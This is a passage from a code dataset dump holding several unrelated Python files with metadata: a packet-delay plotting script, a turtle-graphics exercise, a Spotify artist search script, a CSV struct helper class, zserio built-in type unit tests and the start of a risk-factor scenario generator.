all_pkt_type,\r\n 'pkt_size' : all_pkt_size,\r\n 'flags' : all_flags,\r\n 'fids' : all_fids,\r\n 'src_addr' : all_src_addr,\r\n 'dest_addr' : all_dest_addr,\r\n 'seq_nums' : all_seq_nums,\r\n 'pkt_id' : all_pktid \r\n }\r\n\r\n#delay hesaplamak icin gerekli fonksiyon yazildi\r\ndef calculate_delay(sendTimes, receivedTimes): \r\n\r\n delay = 0.0\r\n delay = receivedTimes - sendTimes\r\n return delay\r\n\r\n# DataFrame olusturuluyor\r\ndf = pd.DataFrame(data)\r\n \r\n'''eventi r olan ve aynı islem zamanında gonderilmis olan veriyi\r\nbir yerde toplamak ve delay hesaplamak icin while dongusunde\r\ngerekli islemler yapildi, tum delay degerleri hesaplandi'''\r\ni=1\r\nreceived_pkt = 0\r\ntotal_times = 0.0 \r\ndelay_list = [] #delay degerlerini tutmak icin liste olusturuldu\r\ntimes_list = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19] \r\ntemp_delay = 0.0\r\n\r\nwhile(i!= 20):\r\n select_times = df.loc[(df['event'] == 'r') & ((df['times']) >= i ) & ((df['times']) < i+1 )]\r\n select_received = (select_times.loc[(df['pkt_type'] == 'tcp')])\r\n select_send = (select_times.loc[(df['pkt_type'] == 'ack')])\r\n times_received = select_received['times'].sum()\r\n times_send = select_send['times'].sum()\r\n #print(times_send)\r\n temp_delay = calculate_delay(times_send, times_received)\r\n #print(temp_delay)\r\n\r\n delay_list.append(temp_delay) \r\n i = i+1\r\n \r\n# x ekseni zaman y ekseni end to end delay olacak şekilde grafik çizdirildi\r\nimport matplotlib.pyplot as plt\r\nplt.plot(times_list, delay_list)\r\nplt.ylabel('delay as seconds')\r\nplt.xlabel('times as seconds')\r\nplt.title('Change of delay over time')\r\nplt.show()\r\n\r\n \r\n\r\n\r\n\r\n","sub_path":"endToEndDelay.py","file_name":"endToEndDelay.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453869465","text":"# 2nd program - Turtle [2020.09.28]\nimport turtle\nt = turtle.Turtle()\n\nNBR_DE_MARCHE = 5\nNBR_DE_PIXELS = 10\n\n# fonction escalier(taille en pixel, nbr. de marches)\ndef escalier(taille_pxl, nbr_marhces) :\n for i in range (0, NBR_DE_MARCHE):\n t.forward(taille_pxl)\n t.left(90)\n t.forward(taille_pxl)\n t.right(90)\n taille_pxl += taille_pxl / 2\n # taille_pxl -= taille_pxl / 2\n t.forward(taille_pxl)\n\n# fonction carre(taille d'un cote en pixel)\ndef carre(taille_pxl_cote) :\n for i in range (0, 4):\n t.forward(taille_pxl_cote)\n t.left(90)\n\n# fonction carres(nbr. de carrés)\ndef carres(nbr_carres, taille_depart):\n for c in range(0, nbr_carres) :\n carre(taille_depart * (c+1))\n\nescalier(NBR_DE_PIXELS, NBR_DE_MARCHE)\nt.clear()\nt.backward(100)\ncarres(5, 10)\n\nturtle.done()\n\n","sub_path":"Python (debutant)/2_programme_tortue/programme_tortue/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298783931","text":"import requests\nimport argparse\nfrom secret import spotify_token\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Script to find stats of users individually or as a group\",allow_abbrev=False)\n parser.add_argument('-top',\"--top_track\", action='store', type=str,help=\"Enter the artist name\")\n #parser.add_argument('-t',\"--text\", action='store', type=str,help=\"Use the text file\")\n args = parser.parse_args()\n if args.top_track:\n #spotify:artist:5Pwc4xIPtQLFEnJriah9YJ\n song_name=\"hot girl bummer\"\n artist=args.top_track\n \"\"\"Search For the Song\"\"\"\n query = \"https://api.spotify.com/v1/search?q={}&type=artist\".format(\n artist\n )\n\n response = requests.get(\n query,\n headers={\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {}\".format(spotify_token)\n }\n )\n response_json = response.json()\n data = response_json[\"artists\"][\"items\"][0]\n\n print(data)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"267537056","text":"# This file is part of comma, a generic and flexible library\n# Copyright (c) 2011 The University of Sydney\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the University of Sydney nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE\n# GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT\n# HOLDERS AND CONTRIBUTORS \\\"AS IS\\\" AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN\n# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport numpy as np\nfrom ..numpy import types_of_dtype, structured_dtype, type_to_string\n\n\nclass struct(object):\n \"\"\"\n see github.com/acfr/comma/wiki/python-csv-module for details\n \"\"\"\n default_field_name = 'comma_struct_default_field_name_'\n\n def __init__(self, concise_fields, *concise_types):\n self.concise_types = concise_types\n self.concise_fields = self._fill_blanks(concise_fields)\n self._check_fields_conciseness()\n #self.dtype = np.dtype(zip(self.concise_fields, self.concise_types))\n self.dtype = np.dtype([(x,y) for x,y in zip(self.concise_fields, self.concise_types)])\n self.fields = self._full_xpath_fields()\n self.nondefault_fields = self._nondefault_fields()\n self.types = self._basic_types()\n self.shorthand = self._shorthand()\n self.format = ','.join(self.types)\n #self.flat_dtype = np.dtype(zip(self.fields, self.types))\n self.flat_dtype = np.dtype([(x,y) for x,y in zip(self.fields, self.types)])\n unrolled_types = types_of_dtype(self.flat_dtype, unroll=True)\n self.unrolled_flat_dtype = structured_dtype(','.join(unrolled_types))\n self.type_of_field = dict(zip(self.fields, self.types))\n leaves = tuple(xpath.split('/')[-1] for xpath in self.fields)\n self.ambiguous_leaves = set(leaf for leaf in leaves if leaves.count(leaf) > 1)\n self.xpath_of_leaf = self._xpath_of_leaf(leaves)\n\n def __call__(self, size=1):\n return np.empty(size, dtype=self)\n\n def to_tuple(self, s):\n \"\"\"\n convert a scalar or 1d array of dtype defined by struct to tuple\n\n >>> import comma\n >>> struct = comma.csv.struct('a,b', 'S2', 'u4')\n >>> data = struct()\n >>> data['a'] = 'ab'\n >>> data['b'] = 12\n >>> struct.to_tuple(data)\n ('ab', 12L)\n \"\"\"\n if s.dtype != self.dtype:\n msg = \"expected {}, got {}\".format(repr(self.dtype), repr(s.dtype))\n raise TypeError(msg)\n if not (s.shape == (1,) or s.shape == ()):\n msg = \"expected a scalar or 1d array with size=1, got shape={}\".format(s.shape)\n raise ValueError(msg)\n return s.view(self.unrolled_flat_dtype).item()\n\n def expand_shorthand(self, compressed_fields):\n \"\"\"\n return tuple of full-xpath fields corresponding to the given shorthand\n\n >>> import comma\n >>> inner = comma.csv.struct('i,j', 'u1', 'u1')\n >>> outer = comma.csv.struct('in', inner)\n >>> outer.expand_shorthand('in')\n ('in/i', 'in/j')\n \"\"\"\n if isinstance(compressed_fields, str):\n compressed_fields = compressed_fields.split(',')\n expand = self.shorthand.get\n field_tuples = map(lambda name: expand(name) or (name,), compressed_fields)\n return sum(field_tuples, ())\n\n def _nondefault_fields(self):\n default_name = struct.default_field_name\n return tuple(map(lambda f: '' if f.startswith(default_name) else f, self.fields))\n\n def _fill_blanks(self, fields):\n if isinstance(fields, str):\n fields = fields.split(',')\n ntypes = len(self.concise_types)\n if len(fields) > ntypes:\n fields_without_type = ','.join(fields[ntypes:])\n msg = \"missing types for fields '{}'\".format(fields_without_type)\n raise ValueError(msg)\n omitted_fields = [''] * (ntypes - len(fields))\n fields_without_blanks = []\n for index, field in enumerate(fields + omitted_fields):\n if field:\n nonblank_field = field\n else:\n nonblank_field = '{}{}'.format(struct.default_field_name, index)\n fields_without_blanks.append(nonblank_field)\n return fields_without_blanks\n\n def _check_fields_conciseness(self):\n for field in self.concise_fields:\n if '/' in field:\n msg = \"expected fields without '/', got '{}'\".format(field)\n raise ValueError(msg)\n\n def _full_xpath_fields(self):\n fields = []\n for name, type in zip(self.concise_fields, self.concise_types):\n if isinstance(type, struct):\n fields_of_type = [name + '/' + field for field in type.fields]\n fields.extend(fields_of_type)\n else:\n fields.append(name)\n return tuple(fields)\n\n def _basic_types(self):\n types = []\n for type in self.concise_types:\n if isinstance(type, struct):\n types.extend(type.types)\n else:\n types.append(type_to_string(type))\n return tuple(types)\n\n def _shorthand(self):\n shorthand = {}\n for name, type in zip(self.concise_fields, self.concise_types):\n if not isinstance(type, struct):\n continue\n fields_of_type = [name + '/' + field for field in type.fields]\n shorthand[name] = tuple(fields_of_type)\n for subname, subfields in type.shorthand.iteritems():\n xpath = name + '/' + subname\n shorthand[xpath] = tuple(name + '/' + field for field in subfields)\n return shorthand\n\n def _xpath_of_leaf(self, leaves):\n xpath_of_leaf = dict(zip(leaves, self.fields))\n for ambiguous_leaf in self.ambiguous_leaves:\n del xpath_of_leaf[ambiguous_leaf]\n return xpath_of_leaf\n","sub_path":"python/comma/csv/struct.py","file_name":"struct.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"548522122","text":"import sys\nimport unittest\n\nimport zserio\n\nfrom testutils import getZserioApi\n\nclass AllBuiltInTypesTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.api = getZserioApi(__file__, \"builtin_types.zs\").all_builtin_types\n\n def testUint8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setUint8Type(zserio.limits.UINT8_MAX)\n self.assertEqual(zserio.limits.UINT8_MAX, allBuiltInTypes.getUint8Type())\n\n def testUint16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setUint16Type(zserio.limits.UINT16_MAX)\n self.assertEqual(zserio.limits.UINT16_MAX, allBuiltInTypes.getUint16Type())\n\n def testUint32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setUint32Type(zserio.limits.UINT32_MAX)\n self.assertEqual(zserio.limits.UINT32_MAX, allBuiltInTypes.getUint32Type())\n\n def testUint64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setUint64Type(zserio.limits.UINT64_MAX)\n self.assertEqual(zserio.limits.UINT64_MAX, allBuiltInTypes.getUint64Type())\n\n def testInt8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setInt8Type(zserio.limits.INT8_MAX)\n self.assertEqual(zserio.limits.INT8_MAX, allBuiltInTypes.getInt8Type())\n\n def testInt16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setInt16Type(zserio.limits.INT16_MAX)\n self.assertEqual(zserio.limits.INT16_MAX, allBuiltInTypes.getInt16Type())\n\n def testInt32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setInt32Type(zserio.limits.INT32_MAX)\n self.assertEqual(zserio.limits.INT32_MAX, allBuiltInTypes.getInt32Type())\n\n def testInt64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setInt64Type(zserio.limits.INT64_MAX)\n self.assertEqual(zserio.limits.INT64_MAX, allBuiltInTypes.getInt64Type())\n\n def testBitField7Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield7Type = 0x7F\n allBuiltInTypes.setBitfield7Type(maxBitfield7Type)\n self.assertEqual(maxBitfield7Type, allBuiltInTypes.getBitfield7Type())\n\n def testBitField8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield8Type = zserio.limits.UINT8_MAX\n allBuiltInTypes.setBitfield8Type(maxBitfield8Type)\n self.assertEqual(maxBitfield8Type, allBuiltInTypes.getBitfield8Type())\n\n def testBitField15Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield15Type = 0x7FFF\n allBuiltInTypes.setBitfield15Type(maxBitfield15Type)\n self.assertEqual(maxBitfield15Type, allBuiltInTypes.getBitfield15Type())\n\n def testBitField16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield16Type = zserio.limits.UINT16_MAX\n allBuiltInTypes.setBitfield16Type(maxBitfield16Type)\n self.assertEqual(maxBitfield16Type, allBuiltInTypes.getBitfield16Type())\n\n def testBitField31Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield31Type = 0x7FFFFFFF\n allBuiltInTypes.setBitfield31Type(maxBitfield31Type)\n self.assertEqual(maxBitfield31Type, allBuiltInTypes.getBitfield31Type())\n\n def testBitField32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield32Type = zserio.limits.UINT32_MAX\n allBuiltInTypes.setBitfield32Type(maxBitfield32Type)\n self.assertEqual(maxBitfield32Type, allBuiltInTypes.getBitfield32Type())\n\n def testBitField63Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxBitfield63Type = 0x7FFFFFFFFFFFFFFF\n allBuiltInTypes.setBitfield63Type(maxBitfield63Type)\n self.assertEqual(maxBitfield63Type, allBuiltInTypes.getBitfield63Type())\n\n def testVariableBitfieldType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxVariableBitfieldType = zserio.limits.UINT64_MAX\n allBuiltInTypes.setVariableBitfieldType(maxVariableBitfieldType)\n self.assertEqual(maxVariableBitfieldType, allBuiltInTypes.getVariableBitfieldType())\n\n def testVariableBitField8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n maxVariableBitfield8Type = zserio.limits.UINT8_MAX\n allBuiltInTypes.setVariableBitfield8Type(maxVariableBitfield8Type)\n self.assertEqual(maxVariableBitfield8Type, allBuiltInTypes.getVariableBitfield8Type())\n\n def testIntField8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setIntfield8Type(zserio.limits.INT8_MAX)\n self.assertEqual(zserio.limits.INT8_MAX, allBuiltInTypes.getIntfield8Type())\n\n def testIntField16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setIntfield16Type(zserio.limits.INT16_MAX)\n self.assertEqual(zserio.limits.INT16_MAX, allBuiltInTypes.getIntfield16Type())\n\n def testIntField32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setIntfield32Type(zserio.limits.INT32_MAX)\n self.assertEqual(zserio.limits.INT32_MAX, allBuiltInTypes.getIntfield32Type())\n\n def testIntField64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setIntfield64Type(zserio.limits.INT64_MAX)\n self.assertEqual(zserio.limits.INT64_MAX, allBuiltInTypes.getIntfield64Type())\n\n def testVariableIntfieldType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVariableIntfieldType(zserio.limits.INT16_MAX)\n self.assertEqual(zserio.limits.INT16_MAX, allBuiltInTypes.getVariableIntfieldType())\n\n def testVariableIntField8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVariableIntfield8Type(zserio.limits.INT8_MAX)\n self.assertEqual(zserio.limits.INT8_MAX, allBuiltInTypes.getVariableIntfield8Type())\n\n def testFloat16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setFloat16Type(sys.float_info.max)\n self.assertEqual(sys.float_info.max, allBuiltInTypes.getFloat16Type())\n\n def testFloat32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setFloat32Type(sys.float_info.max)\n self.assertEqual(sys.float_info.max, allBuiltInTypes.getFloat32Type())\n\n def testFloat64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setFloat64Type(sys.float_info.max)\n self.assertEqual(sys.float_info.max, allBuiltInTypes.getFloat64Type())\n\n def testVaruint16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVaruint16Type(zserio.limits.VARUINT16_MAX)\n self.assertEqual(zserio.limits.VARUINT16_MAX, allBuiltInTypes.getVaruint16Type())\n\n def testVaruint32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVaruint32Type(zserio.limits.VARUINT32_MAX)\n self.assertEqual(zserio.limits.VARUINT32_MAX, allBuiltInTypes.getVaruint32Type())\n\n def testVaruint64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVaruint64Type(zserio.limits.VARUINT64_MAX)\n self.assertEqual(zserio.limits.VARUINT64_MAX, allBuiltInTypes.getVaruint64Type())\n\n def testVaruintType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVaruintType(zserio.limits.VARUINT_MIN)\n self.assertEqual(zserio.limits.VARUINT_MIN, allBuiltInTypes.getVaruintType())\n\n allBuiltInTypes.setVaruintType(zserio.limits.VARUINT_MAX)\n self.assertEqual(zserio.limits.VARUINT_MAX, allBuiltInTypes.getVaruintType())\n\n def testVarsizeType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarsizeType(zserio.limits.VARSIZE_MIN)\n self.assertEqual(zserio.limits.VARSIZE_MIN, allBuiltInTypes.getVarsizeType())\n\n allBuiltInTypes.setVarsizeType(zserio.limits.VARSIZE_MAX)\n self.assertEqual(zserio.limits.VARSIZE_MAX, allBuiltInTypes.getVarsizeType())\n\n def testVarint16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarint16Type(zserio.limits.VARINT16_MAX)\n self.assertEqual(zserio.limits.VARINT16_MAX, allBuiltInTypes.getVarint16Type())\n\n def testVarint32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarint32Type(zserio.limits.VARINT32_MAX)\n self.assertEqual(zserio.limits.VARINT32_MAX, allBuiltInTypes.getVarint32Type())\n\n def testVarint64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarint64Type(zserio.limits.VARINT64_MAX)\n self.assertEqual(zserio.limits.VARINT64_MAX, allBuiltInTypes.getVarint64Type())\n\n def testVarintType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarintType(zserio.limits.VARINT_MIN)\n self.assertEqual(zserio.limits.VARINT_MIN, allBuiltInTypes.getVarintType())\n\n allBuiltInTypes.setVarintType(zserio.limits.VARINT_MAX)\n self.assertEqual(zserio.limits.VARINT_MAX, allBuiltInTypes.getVarintType())\n\n def testBoolType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setBoolType(True)\n self.assertTrue(allBuiltInTypes.getBoolType())\n allBuiltInTypes.setBoolType(False)\n self.assertFalse(allBuiltInTypes.getBoolType())\n\n def testStringType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n testString = \"TEST\"\n allBuiltInTypes.setStringType(testString)\n self.assertEqual(testString, allBuiltInTypes.getStringType())\n\n def testExternType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n testExtern = self._getExternalBitBuffer()\n allBuiltInTypes.setExternType(testExtern)\n self.assertEqual(testExtern, allBuiltInTypes.getExternType())\n\n def testBitSizeOf(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setBoolType(True)\n allBuiltInTypes.setUint8Type(1)\n allBuiltInTypes.setUint16Type(zserio.limits.UINT16_MAX)\n allBuiltInTypes.setUint32Type(zserio.limits.UINT32_MAX)\n allBuiltInTypes.setUint64Type(zserio.limits.UINT64_MAX)\n allBuiltInTypes.setInt8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setInt16Type(zserio.limits.INT16_MAX)\n allBuiltInTypes.setInt32Type(zserio.limits.INT32_MAX)\n allBuiltInTypes.setInt64Type(zserio.limits.INT64_MAX)\n allBuiltInTypes.setBitfield7Type(0x7F)\n allBuiltInTypes.setBitfield8Type(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setBitfield15Type(0x7FFF)\n allBuiltInTypes.setBitfield16Type(zserio.limits.UINT16_MAX)\n allBuiltInTypes.setBitfield31Type(0x7FFFFFFF)\n allBuiltInTypes.setBitfield32Type(zserio.limits.UINT32_MAX)\n allBuiltInTypes.setBitfield63Type(0x7FFFFFFFFFFFFFFF)\n allBuiltInTypes.setVariableBitfieldType(1)\n allBuiltInTypes.setVariableBitfield8Type(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setIntfield8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setIntfield16Type(zserio.limits.INT16_MAX)\n allBuiltInTypes.setIntfield32Type(zserio.limits.INT32_MAX)\n allBuiltInTypes.setIntfield64Type(zserio.limits.INT64_MAX)\n allBuiltInTypes.setVariableIntfieldType(1)\n allBuiltInTypes.setVariableIntfield8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setFloat16Type(sys.float_info.max)\n allBuiltInTypes.setFloat32Type(sys.float_info.max)\n allBuiltInTypes.setFloat64Type(sys.float_info.max)\n allBuiltInTypes.setVaruint16Type(zserio.limits.VARUINT16_MAX)\n allBuiltInTypes.setVaruint32Type(zserio.limits.VARUINT32_MAX)\n allBuiltInTypes.setVaruint64Type(zserio.limits.VARUINT64_MAX)\n allBuiltInTypes.setVaruintType(zserio.limits.VARUINT_MAX)\n allBuiltInTypes.setVarsizeType(zserio.limits.VARSIZE_MAX)\n allBuiltInTypes.setVarint16Type(zserio.limits.VARINT16_MAX)\n allBuiltInTypes.setVarint32Type(zserio.limits.VARINT32_MAX)\n allBuiltInTypes.setVarint64Type(zserio.limits.VARINT64_MAX)\n allBuiltInTypes.setVarintType(zserio.limits.VARINT_MAX)\n allBuiltInTypes.setStringType(\"TEST\")\n allBuiltInTypes.setExternType(self._getExternalBitBuffer())\n expectedBitSizeOf = 1142\n self.assertEqual(expectedBitSizeOf, allBuiltInTypes.bitSizeOf())\n\n def testReadWrite(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setBoolType(True)\n allBuiltInTypes.setUint8Type(8)\n allBuiltInTypes.setUint16Type(zserio.limits.UINT16_MAX)\n allBuiltInTypes.setUint32Type(zserio.limits.UINT32_MAX)\n allBuiltInTypes.setUint64Type(zserio.limits.UINT64_MAX)\n allBuiltInTypes.setInt8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setInt16Type(zserio.limits.INT16_MAX)\n allBuiltInTypes.setInt32Type(zserio.limits.INT32_MAX)\n allBuiltInTypes.setInt64Type(zserio.limits.INT64_MAX)\n allBuiltInTypes.setBitfield7Type(0x7F)\n allBuiltInTypes.setBitfield8Type(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setBitfield15Type(0x7FFF)\n allBuiltInTypes.setBitfield16Type(zserio.limits.UINT16_MAX)\n allBuiltInTypes.setBitfield31Type(0x7FFFFFFF)\n allBuiltInTypes.setBitfield32Type(zserio.limits.UINT32_MAX)\n allBuiltInTypes.setBitfield63Type(0x7FFFFFFFFFFFFFFF)\n allBuiltInTypes.setVariableBitfieldType(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setVariableBitfield8Type(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setIntfield8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setIntfield16Type(zserio.limits.INT16_MAX)\n allBuiltInTypes.setIntfield32Type(zserio.limits.INT32_MAX)\n allBuiltInTypes.setIntfield64Type(zserio.limits.INT64_MAX)\n allBuiltInTypes.setVariableIntfieldType(zserio.limits.INT8_MAX)\n allBuiltInTypes.setVariableIntfield8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setFloat16Type(1.0)\n allBuiltInTypes.setFloat32Type(1.0)\n allBuiltInTypes.setFloat64Type(sys.float_info.max)\n allBuiltInTypes.setVaruint16Type(zserio.limits.VARUINT16_MAX)\n allBuiltInTypes.setVaruint32Type(zserio.limits.VARUINT32_MAX)\n allBuiltInTypes.setVaruint64Type(zserio.limits.VARUINT64_MAX)\n allBuiltInTypes.setVaruintType(zserio.limits.VARUINT_MAX)\n allBuiltInTypes.setVarsizeType(zserio.limits.VARSIZE_MAX)\n allBuiltInTypes.setVarint16Type(zserio.limits.VARINT16_MAX)\n allBuiltInTypes.setVarint32Type(zserio.limits.VARINT32_MAX)\n allBuiltInTypes.setVarint64Type(zserio.limits.VARINT64_MAX)\n allBuiltInTypes.setVarintType(zserio.limits.VARINT_MAX)\n allBuiltInTypes.setStringType(\"TEST\")\n allBuiltInTypes.setExternType(self._getExternalBitBuffer())\n\n writer = zserio.BitStreamWriter()\n allBuiltInTypes.write(writer)\n reader = zserio.BitStreamReader(writer.getByteArray())\n readAllBuiltInTypes = self.api.AllBuiltInTypes()\n readAllBuiltInTypes.read(reader)\n self.assertEqual(allBuiltInTypes, readAllBuiltInTypes)\n\n def _getExternalBitBuffer(self):\n externalStructure = self.api.ExternalStructure.fromFields(0xCD, 0x03)\n writer = zserio.BitStreamWriter()\n externalStructure.write(writer)\n\n return zserio.BitBuffer(writer.getByteArray(), writer.getBitPosition())\n","sub_path":"test/language/builtin_types/python/AllBuiltInTypesTest.py","file_name":"AllBuiltInTypesTest.py","file_ext":"py","file_size_in_byte":15741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"266371764","text":"\nimport os\nimport itertools\n\nimport acm\n\nimport FRiskFactorScenarioFileGeneration\nimport FRiskFactorFileProcessing\nimport FRiskFactorVolCorrGeneration\nimport FRiskFactorFileProcessing\nimport FRiskFactorExtractionUtils\n\nfrom FRiskFactorExtractionUtils import get_output_filename_simple\nfrom FRiskFactorExtractionUtils import RiskFactorDynamicsEnum\nfrom FRiskFactorScenarioFileGeneration import DATE_ORDER_LAST_TO_FIRST\n\nimport FLogger\nlogger = FLogger.FLogger.GetLogger('FARiskFactorExtraction')\n\nclass GeneratorParameters(object):\n def __init__(self, ael_variables, raw_data):\n self.raw_data = raw_data\n \n self.spec_header = ael_variables[\"header\"]\n self.delimiter = self.spec_header.DelimiterChar()\n self.comment_char = self.spec_header.CommentChar()\n self.cross_delimiter = self.spec_header.CorrelationIdDelimChar()\n self.corr_delimiter = self.spec_header.DelimiterChar()\n self.vol_delimiter = self.spec_header.DelimiterChar()\n \n labels_token = FRiskFactorFileProcessing.labels_token(\n self.comment_char)\n self.ext_ids = list(itertools.filterfalse(\n (lambda it: it == labels_token),\n raw_data.keys()))\n \n self.generate_scenarios = \\\n ael_variables['generate_scenarios'] == \"True\"\n\n self.scenario_calendar = ael_variables['scenario_calendar']\n if not self.scenario_calendar and self.generate_scenarios:\n fx_base_curr = acm.UsedValuationParameters().FxBaseCurrency()\n if not fx_base_curr:\n fx_base_curr = \\\n acm.UsedValuationParameters().AccountingCurrency()\n self.scenario_calendar = fx_base_curr.Calendar()\n if ael_variables[\"scenario_end_day\"] and self.scenario_calendar:\n self.scenario_end_day = \\\n FRiskFactorExtractionUtils.adjust_date(\n ael_variables[\"scenario_end_day\"],\n acm.Time().DateToday(), self.scenario_calendar, \"Preceding\")\n else:\n self.scenario_end_day = None\n\n self.horizon = ael_variables['scenario_horizon']\n \n self.nbr_of_scenarios = ael_variables['nbr_of_scenarios']\n self.overlapping_scenarios = \\\n ael_variables['overlapping_scenarios'] == \"True\"\n \n self.overwrite_scenario_file = \\\n ael_variables['overwrite_scenario_file'] == \"True\"\n \n if ael_variables['scenario_file_path'] and \\\n ael_variables['scenario_file_name']:\n self.scenario_file_path = get_output_filename_simple(\n ael_variables['scenario_file_path'],\n ael_variables['scenario_file_name'],\n self.overwrite_scenario_file, \"\")\n else:\n self.scenario_file_path = None\n \n self.generate_volcorr_file = \\\n ael_variables['generate_volcorr_file'] == \"True\"\n self.estimation_method = ael_variables['estimation_method']\n self.dec_factor = ael_variables['decay_factor']\n \n self.overwrite_volcorr_files = \\\n ael_variables['overwrite_volcorr_files'] == \"True\"\n \n if ael_variables['volcorr_file_path'] and \\\n ael_variables['vol_file_name']:\n self.vol_file_path = get_output_filename_simple(\n ael_variables['volcorr_file_path'],\n ael_variables['vol_file_name'],\n self.overwrite_volcorr_files, \"\")\n else:\n self.vol_file_path = None\n\n if ael_variables['volcorr_file_path'] and \\\n ael_variables['corr_file_name']:\n self.corr_file_path = 